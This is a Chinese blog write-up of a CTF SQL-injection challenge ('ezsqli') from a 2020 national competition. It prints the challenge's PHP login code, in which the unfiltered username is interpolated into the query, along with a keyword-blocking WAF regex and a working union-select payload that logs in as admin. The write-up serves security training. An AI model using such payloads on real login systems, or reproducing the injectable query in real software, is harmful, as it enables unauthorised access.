0
点赞
收藏
分享

微信扫一扫

[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli

梦为马 2023-06-19 阅读 62


[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_php


[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_php_02


hint

<?php
//a "part" of the source code here

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    
    if (!isset($_SESSION['VerifyCode']))
            die("?");

    $username = strval($_POST['username']);
    $password = strval($_POST['password']);

    if ( !sqlWaf($password) )
        alertMes('damn hacker' ,"./index.php");

    $sql = "SELECT * FROM users WHERE username='${username}' AND password= '${password}'";
//    password format: /[A-Za-z0-9]/
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['password'] )
        {
            if ($row['password'] == $password)
            {
                $message = $FLAG;
            } else {
                $message = "username or password wrong, are you admin?";
            }
        } else {
            $message = "wrong user";
        }
    } else {
        $message = "user not exist or wrong password";
    }
}

?>

username没有做任何过滤,为所欲为

一开始以为是group by rollup with,结果发现没办法使得这里为真

if ( $row['username'] === 'admin' && $row['password'] )

然后发现这题原来很简单

[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_sql_03


[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_xml_04

username=1'union select 1,0x61646d696e,3#&password=3&captcha=XXXX

[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_sql_05


举报

相关推荐

网络选拔赛系统

0 条评论